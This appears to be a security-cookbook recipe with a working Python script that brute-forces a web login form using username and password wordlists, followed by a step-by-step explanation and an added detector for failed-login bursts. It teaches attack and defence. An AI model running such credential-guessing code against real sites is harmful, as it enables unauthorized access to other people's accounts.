Brute forcing passwords

Brute forcing may not be the most elegant of solutions, but it will automate what could be a potentially mundane task. Through the use of automation, you can get tasks completed much more quickly, or at least free yourself up to work on something else at the same time.

Getting ready

To be able to use this recipe, you will need a list of usernames that you wish to test and also a list of passwords. While this is not the true definition of brute forcing, it will lower the number of combinations that you will be testing.

Note

If you do not have a password list available, there are many available online, such as the list of the top 10,000 most common passwords on GitHub at https://github.com/neo/discourse_heroku/blob/master/lib/common_passwords/10k-common-passwords.txt.

How to do it…

The following code shows an example of how to implement this recipe:

#brute force passwords
import sys
import urllib
import urllib2

if len(sys.argv) != 3:
    print "usage: %s userlist passwordlist" % (sys.argv[0])
    sys.exit(0)

filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
url = "http://www.vulnerablesite.com/login.html"
foundcreds = []
FailStr="Incorrect User or Password"

for user in userlist:
  user = user.strip()          # drop the trailing newline read from the file
  passwordlist.seek(0)         # rewind so every user gets the full password list
  for password in passwordlist:
    password = password.strip()
    # build the POST body from the current username and password
    data = urllib.urlencode({"username": user, "password": password})
    request = urllib2.urlopen(url,data)
    response = request.read()
    # no failure string in the response means the login was accepted
    if response.find(FailStr) < 0:
      foundcreds.append(user+":"+password)
    request.close()

if len(foundcreds)>0:
  print "Found User and Password combinations:\n"
  for name in foundcreds:
    print name+"\n"
else:
  print "No users found\n"

The following shows an example of the output produced when the script is run:

python bruteforcepasswords.py userlists.txt passwordlist.txt

Found User and Password combinations:

root:toor

angela:trustno1

bob:password123

john:qwerty

How it works…

After the initial importing of the necessary modules and checking the system arguments, we set up password checking:

filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')

The filename arguments are stored in variables, and the files they name are then opened. The 'r' argument means that we are opening these files as read-only.

We also specify our target and initialize an array to store any valid credentials that we find:

url = "http://www.vulnerablesite.com/login.html"
foundcreds = []
FailStr="Incorrect User or Password"

The FailStr variable in the preceding code is just to make our lives easier by having a short variable name to type instead of typing out the entire string.

The main course of this recipe lies within a nested loop in which our automated password checking is carried out:

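for user in userlist:
  user = user.strip()          # drop the trailing newline read from the file
  passwordlist.seek(0)         # rewind so every user gets the full password list
  for password in passwordlist:
    password = password.strip()
    data = urllib.urlencode({"username": user, "password": password})
    request = urllib2.urlopen(url,data)
    response = request.read()
    if response.find(FailStr) < 0:
      foundcreds.append(user+":"+password)
    request.close()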

Within this loop, a request is sent including the username and password as parameters. If the response doesn't contain the string indicating that the username and password combination is invalid, then we know that we have a valid set of credentials. We then add these credentials to the array that we created earlier.

Once all the username and password combinations have been tried, we then check the array to see whether there are any credentials. If so, we print out the credentials. If not, we print out a sad message informing us that we have not found anything:

if len(foundcreds)>0:
  print "Found User and Password combinations:\n"
  for name in foundcreds:
    print name+"\n"
else:
  print "No users found\n"
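
Seen from the server side, the nested loop described above shows up as a burst of failed logins from one client, sometimes ending in a success. The following detector is an added example, not code from this recipe; it is written for Python 3, and the event tuple layout, the thresholds and the sample data are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def detect_bruteforce(events, window=timedelta(seconds=60), max_failures=5):
    """events: iterable of (timestamp, source_ip, username, succeeded).
    Returns {source_ip: {"users": set, "compromised": set}} for each source
    with more than max_failures failed logins inside one sliding window."""
    failures = defaultdict(deque)   # source -> timestamps of recent failures
    targeted = defaultdict(set)     # source -> usernames it failed against
    alerts = {}
    for ts, src, user, ok in sorted(events):
        recent = failures[src]
        while recent and ts - recent[0] > window:   # expire old failures
            recent.popleft()
        if ok:
            # A success from an already-flagged source means a guess worked.
            if src in alerts:
                alerts[src]["compromised"].add(user)
            continue
        recent.append(ts)
        targeted[src].add(user)
        if len(recent) > max_failures:
            # The alert shares the set, so later targets keep being recorded.
            alerts.setdefault(src, {"users": targeted[src], "compromised": set()})
    return alerts

def sample_events():
    """Constructed sample data, not real logs (documentation IP ranges)."""
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    events, second = [], 0
    # 203.0.113.7 walks a password list: 7 misses then a hit for root,
    # 3 misses then a hit for angela, one request per second.
    for user, misses in (("root", 7), ("angela", 3)):
        for attempt in range(misses + 1):
            stamp = t0 + timedelta(seconds=second)
            events.append((stamp, "203.0.113.7", user, attempt == misses))
            second += 1
    # 198.51.100.20 is a person who mistypes once and then logs in.
    events.append((t0 + timedelta(seconds=3), "198.51.100.20", "bob", False))
    events.append((t0 + timedelta(seconds=20), "198.51.100.20", "bob", True))
    return events

if __name__ == "__main__":
    for src, info in detect_bruteforce(sample_events()).items():
        print(src, "targeted:", sorted(info["users"]),
              "compromised:", sorted(info["compromised"]))
```
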

See also

If you're looking to find usernames, you may also want to make use of the Checking username validity and the Brute forcing usernames recipes.
